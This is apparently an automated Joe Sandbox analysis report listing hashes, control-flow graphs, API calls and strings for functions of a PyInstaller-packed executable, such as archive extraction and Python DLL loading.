                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87E0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407299776.00007FF8A87E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8932000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8934000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8949000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407603885.00007FF8A894B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407635609.00007FF8A894C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff8a87e0000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007C6125630
                                                                                                                                                                                                                                        • String ID: :memory:
                                                                                                                                                                                                                                        • API String ID: 1529501491-2920599690
                                                                                                                                                                                                                                        • Opcode ID: 223c0e835e9280b863b94f86a1bb581c8596e66e5017fd81c2f0212ddf9a21fd
                                                                                                                                                                                                                                        • Instruction ID: 5f7e64c4e8fe407ba3509b78d5d4dd8a13e0befd6d51cfe6829c69f35903aa7b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 223c0e835e9280b863b94f86a1bb581c8596e66e5017fd81c2f0212ddf9a21fd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BE42B122E0E786A2EB658F26945433927A0FF95BC5F094139DE4E53791DF7CE890C328
                                                                                                                                                                                                                                        Function 00007FF78DA592F0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2295610775-0
                                                                                                                                                                                                                                        • Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                        • Instruction ID: 7acfea21dac7172148ce9ffb628e02fbf80a6bfeb7f581dcf08e414705153f4c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F9F0496261C641C6F7609F90B44DB76A360BB44778F740235D9AD456D4EF3CD44DCA11
                                                                                                                                                                                                                                        Function 00007FF8A87EF490 Relevance: 1.7, APIs: 1, Instructions: 204COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87E0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407299776.00007FF8A87E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8932000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8934000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8949000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407603885.00007FF8A894B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407635609.00007FF8A894C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff8a87e0000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InfoSystem
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 31276548-0
                                                                                                                                                                                                                                        • Opcode ID: 1d4a23596340e2b851e9cbd1cd717de596e1e73bc4475c85f957dec04d105ea9
                                                                                                                                                                                                                                        • Instruction ID: 6015aac9747b9a561202ad81fa8d623abbe7ea703f7f3c75d5a4f1ef5f22383b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d4a23596340e2b851e9cbd1cd717de596e1e73bc4475c85f957dec04d105ea9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DAA13E24E4BB07A2FE55CF65A45833422A0FF65BC6F580579C80D57BA0EF7CE4519328
                                                                                                                                                                                                                                        Function 00007FF78DA51950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 267 7ff78da51950-7ff78da5198b call 7ff78da545b0 270 7ff78da51c4e-7ff78da51c72 call 7ff78da5c5c0 267->270 271 7ff78da51991-7ff78da519d1 call 7ff78da57f80 267->271 276 7ff78da51c3b-7ff78da51c3e call 7ff78da600bc 271->276 277 7ff78da519d7-7ff78da519e7 call 7ff78da60744 271->277 281 7ff78da51c43-7ff78da51c4b 276->281 282 7ff78da51a08-7ff78da51a24 call 7ff78da6040c 277->282 283 7ff78da519e9-7ff78da51a03 call 7ff78da64f78 call 7ff78da52910 277->283 281->270 289 7ff78da51a45-7ff78da51a5a call 7ff78da64f98 282->289 290 7ff78da51a26-7ff78da51a40 call 7ff78da64f78 call 7ff78da52910 282->290 283->276 297 7ff78da51a7b-7ff78da51afc call 7ff78da51c80 * 2 call 7ff78da60744 289->297 298 7ff78da51a5c-7ff78da51a76 call 7ff78da64f78 call 7ff78da52910 289->298 290->276 309 7ff78da51b01-7ff78da51b14 call 7ff78da64fb4 297->309 298->276 312 7ff78da51b35-7ff78da51b4e call 7ff78da6040c 309->312 313 7ff78da51b16-7ff78da51b30 call 7ff78da64f78 call 7ff78da52910 309->313 318 7ff78da51b6f-7ff78da51b8b call 7ff78da60180 312->318 319 7ff78da51b50-7ff78da51b6a call 7ff78da64f78 call 7ff78da52910 312->319 313->276 327 7ff78da51b8d-7ff78da51b99 call 7ff78da52710 318->327 328 7ff78da51b9e-7ff78da51bac 318->328 319->276 327->276 328->276 329 7ff78da51bb2-7ff78da51bb9 328->329 332 7ff78da51bc1-7ff78da51bc7 329->332 334 7ff78da51bc9-7ff78da51bd6 332->334 335 7ff78da51be0-7ff78da51bef 332->335 336 7ff78da51bf1-7ff78da51bfa 334->336 335->335 335->336 337 7ff78da51bfc-7ff78da51bff 336->337 338 7ff78da51c0f 336->338 337->338 339 7ff78da51c01-7ff78da51c04 337->339 340 7ff78da51c11-7ff78da51c24 338->340 339->338 341 7ff78da51c06-7ff78da51c09 339->341 342 7ff78da51c2d-7ff78da51c39 340->342 343 7ff78da51c26 340->343 341->338 344 7ff78da51c0b-7ff78da51c0d 341->344 342->276 342->332 343->342 344->340
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA57F80: _fread_nolock.LIBCMT ref: 00007FF78DA5802A
                                                                                                                                                                                                                                        • _fread_nolock.LIBCMT ref: 00007FF78DA51A1B
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA52910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF78DA51B6A), ref: 00007FF78DA5295E
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                        • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                        • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                        • Opcode ID: 53af67305d532fbc314f4c998b34aeb01e511dd16d42ec936fdd9680fdd2256a
                                                                                                                                                                                                                                        • Instruction ID: f150497cc9db9e2cc3b7950791f2096e1d46cd7d836e82e32eafdcd02b72e33c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 53af67305d532fbc314f4c998b34aeb01e511dd16d42ec936fdd9680fdd2256a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D5816371A0D68686EB60FB64E040AB9B3A0FF44744FB44431D98D87785FE3DE949C762
                                                                                                                                                                                                                                        Function 00007FF78DA51470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                        • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                        • Opcode ID: 9de0508d624f5450d0515946ea3b47b1e27dbb23ab3c408e47dc67f8f8a2cece
                                                                                                                                                                                                                                        • Instruction ID: 8cbe3c5390da168785e7f66b97b79bb2c6dbf31273a18dd801e5468cb0ed9784
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9de0508d624f5450d0515946ea3b47b1e27dbb23ab3c408e47dc67f8f8a2cece
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C3417161A0C64285EA10EBA1E4409B9F3A0BF44B94FF44832ED5E47795FF7CE949C722
                                                                                                                                                                                                                                        Function 00007FF78DA51210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 528 7ff78da51210-7ff78da5126d call 7ff78da5bdf0 531 7ff78da51297-7ff78da512af call 7ff78da64fb4 528->531 532 7ff78da5126f-7ff78da51296 call 7ff78da52710 528->532 537 7ff78da512d4-7ff78da512e4 call 7ff78da64fb4 531->537 538 7ff78da512b1-7ff78da512cf call 7ff78da64f78 call 7ff78da52910 531->538 544 7ff78da51309-7ff78da5131b 537->544 545 7ff78da512e6-7ff78da51304 call 7ff78da64f78 call 7ff78da52910 537->545 551 7ff78da51439-7ff78da5146d call 7ff78da5bad0 call 7ff78da64fa0 * 2 538->551 547 7ff78da51320-7ff78da5133d call 7ff78da6040c 544->547 545->551 554 7ff78da51342-7ff78da51345 547->554 557 7ff78da5134b-7ff78da51355 call 7ff78da60180 554->557 558 7ff78da51431 554->558 557->558 564 7ff78da5135b-7ff78da51367 557->564 558->551 566 7ff78da51370-7ff78da51398 call 7ff78da5a230 564->566 569 7ff78da5139a-7ff78da5139d 566->569 570 7ff78da51416-7ff78da5142c call 7ff78da52710 566->570 571 7ff78da5139f-7ff78da513a9 569->571 572 7ff78da51411 569->572 570->558 574 7ff78da513ab-7ff78da513c1 call 7ff78da60b4c 571->574 575 7ff78da513d4-7ff78da513d7 571->575 572->570 582 7ff78da513c3-7ff78da513cd call 7ff78da60180 574->582 583 7ff78da513cf-7ff78da513d2 574->583 577 7ff78da513d9-7ff78da513e7 call 7ff78da79ea0 575->577 578 7ff78da513ea-7ff78da513ef 575->578 577->578 578->566 581 7ff78da513f5-7ff78da513f8 578->581 585 7ff78da5140c-7ff78da5140f 581->585 586 7ff78da513fa-7ff78da513fd 581->586 582->578 582->583 583->570 585->558 586->570 588 7ff78da513ff-7ff78da51407 586->588 588->547
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                        • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                        • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                        • Opcode ID: c071fae04400aaba9d8a24e5b62ce610f1ca997db65dc53a1f24edd26e5d05d7
                                                                                                                                                                                                                                        • Instruction ID: 83bdeffa9b284bc39f9b9522989849a960c31d204fa483dd02379651e05699df
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c071fae04400aaba9d8a24e5b62ce610f1ca997db65dc53a1f24edd26e5d05d7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D451C362A0D64281E660BB91A450BBAA2A0FF45B94FF44131ED4D877C5FF3CED49C312
                                                                                                                                                                                                                                        Function 00007FF78DA536B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,00007FF78DA53804), ref: 00007FF78DA536E1
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF78DA53804), ref: 00007FF78DA536EB
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA52C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF78DA53706,?,00007FF78DA53804), ref: 00007FF78DA52C9E
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA52C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF78DA53706,?,00007FF78DA53804), ref: 00007FF78DA52D63
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA52C50: MessageBoxW.USER32 ref: 00007FF78DA52D99
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                        • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                        • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                        • Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                        • Instruction ID: 7717ac3ef6787c80bccf3a6e8d4662c83217e52139907c3021cf21ed31e9620a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F216051F1C64291FA20BB60E805BBAA260BF88354FF00132E59DC65D5FF2CE90DC722
                                                                                                                                                                                                                                        Function 00007FF78DA6BACC Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 830 7ff78da6bacc-7ff78da6baf2 831 7ff78da6bb0d-7ff78da6bb11 830->831 832 7ff78da6baf4-7ff78da6bb08 call 7ff78da64f58 call 7ff78da64f78 830->832 834 7ff78da6bee7-7ff78da6bef3 call 7ff78da64f58 call 7ff78da64f78 831->834 835 7ff78da6bb17-7ff78da6bb1e 831->835 849 7ff78da6befe 832->849 851 7ff78da6bef9 _invalid_parameter_noinfo 834->851 835->834 838 7ff78da6bb24-7ff78da6bb52 835->838 838->834 841 7ff78da6bb58-7ff78da6bb5f 838->841 844 7ff78da6bb78-7ff78da6bb7b 841->844 845 7ff78da6bb61-7ff78da6bb73 call 7ff78da64f58 call 7ff78da64f78 841->845 847 7ff78da6bee3-7ff78da6bee5 844->847 848 7ff78da6bb81-7ff78da6bb87 844->848 845->851 853 7ff78da6bf01-7ff78da6bf18 847->853 848->847 854 7ff78da6bb8d-7ff78da6bb90 848->854 849->853 851->849 854->845 856 7ff78da6bb92-7ff78da6bbb7 854->856 858 7ff78da6bbb9-7ff78da6bbbb 856->858 859 7ff78da6bbea-7ff78da6bbf1 856->859 862 7ff78da6bbbd-7ff78da6bbc4 858->862 863 7ff78da6bbe2-7ff78da6bbe8 858->863 860 7ff78da6bbc6-7ff78da6bbdd call 7ff78da64f58 call 7ff78da64f78 _invalid_parameter_noinfo 859->860 861 7ff78da6bbf3-7ff78da6bbff call 7ff78da6d66c 859->861 883 7ff78da6bd70 860->883 869 7ff78da6bc04-7ff78da6bc1b call 7ff78da6a9b8 * 2 861->869 862->860 862->863 864 7ff78da6bc68-7ff78da6bc7f 863->864 867 7ff78da6bcfa-7ff78da6bd04 call 7ff78da7398c 864->867 868 7ff78da6bc81-7ff78da6bc89 864->868 881 7ff78da6bd8e 867->881 882 7ff78da6bd0a-7ff78da6bd1f 867->882 868->867 871 7ff78da6bc8b-7ff78da6bc8d 868->871 891 7ff78da6bc1d-7ff78da6bc33 call 7ff78da64f78 call 7ff78da64f58 869->891 892 7ff78da6bc38-7ff78da6bc63 call 7ff78da6c2f4 869->892 871->867 875 7ff78da6bc8f-7ff78da6bca5 871->875 875->867 879 7ff78da6bca7-7ff78da6bcb3 875->879 879->867 884 7ff78da6bcb5-7ff78da6bcb7 879->884 887 7ff78da6bd93-7ff78da6bdb3 ReadFile 881->887 882->881 888 7ff78da6bd21-7ff78da6bd33 GetConsoleMode 882->888 885 7ff78da6bd73-7ff78da6bd7d call 7ff78da6a9b8 883->885 884->867 889 7ff78da6bcb9-7ff78da6bcd1 884->889 885->853 893 7ff78da6bead-7ff78da6beb6 GetLastError 887->893 894 7ff78da6bdb9-7ff78da6bdc1 887->894 888->881 895 7ff78da6bd35-7ff78da6bd3d 888->895 889->867 899 7ff78da6bcd3-7ff78da6bcdf 889->899 891->883 892->864 897 7ff78da6beb8-7ff78da6bece call 7ff78da64f78 call 7ff78da64f58 893->897 898 7ff78da6bed3-7ff78da6bed6 893->898 894->893 902 7ff78da6bdc7 894->902 895->887 896 7ff78da6bd3f-7ff78da6bd61 ReadConsoleW 895->896 904 7ff78da6bd63 GetLastError 896->904 905 7ff78da6bd82-7ff78da6bd8c 896->905 897->883 908 7ff78da6bedc-7ff78da6bede 898->908 909 7ff78da6bd69-7ff78da6bd6b call 7ff78da64eec 898->909 899->867 907 7ff78da6bce1-7ff78da6bce3 899->907 911 7ff78da6bdce-7ff78da6bde3 902->911 904->909 905->911 907->867 915 7ff78da6bce5-7ff78da6bcf5 907->915 908->885 909->883 911->885 917 7ff78da6bde5-7ff78da6bdf0 911->917 915->867 920 7ff78da6be17-7ff78da6be1f 917->920 921 7ff78da6bdf2-7ff78da6be0b call 7ff78da6b6e4 917->921 923 7ff78da6be9b-7ff78da6bea8 call 7ff78da6b524 920->923 924 7ff78da6be21-7ff78da6be33 920->924 927 7ff78da6be10-7ff78da6be12 921->927 923->927 928 7ff78da6be8e-7ff78da6be96 924->928 929 7ff78da6be35 924->929 927->885 928->885 931 7ff78da6be3a-7ff78da6be41 929->931 932 7ff78da6be7d-7ff78da6be88 931->932 933 7ff78da6be43-7ff78da6be47 931->933 932->928 934 7ff78da6be49-7ff78da6be50 933->934 935 7ff78da6be63 933->935 934->935 936 7ff78da6be52-7ff78da6be56 934->936 937 7ff78da6be69-7ff78da6be79 935->937 936->935 938 7ff78da6be58-7ff78da6be61 936->938 937->931 939 7ff78da6be7b 937->939 938->937 939->928
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
                                                                                                                                                                                                                                        • Instruction ID: 46536c5922b77fcf228592f417f6fff557ab2719c0fd3e374e782951251f6bed
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89C1C42290C686D1E761AB95A440ABDB764FB81B80FF54131EA4E07791EF7CEC4DC722
                                                                                                                                                                                                                                        Function 00007FF78DA56350 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                        • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                        • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                        • Opcode ID: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
                                                                                                                                                                                                                                        • Instruction ID: 5c095a7f8edb46826f69add7f882c1d7a06fe95aeb58edee28593bcec0e75bdb
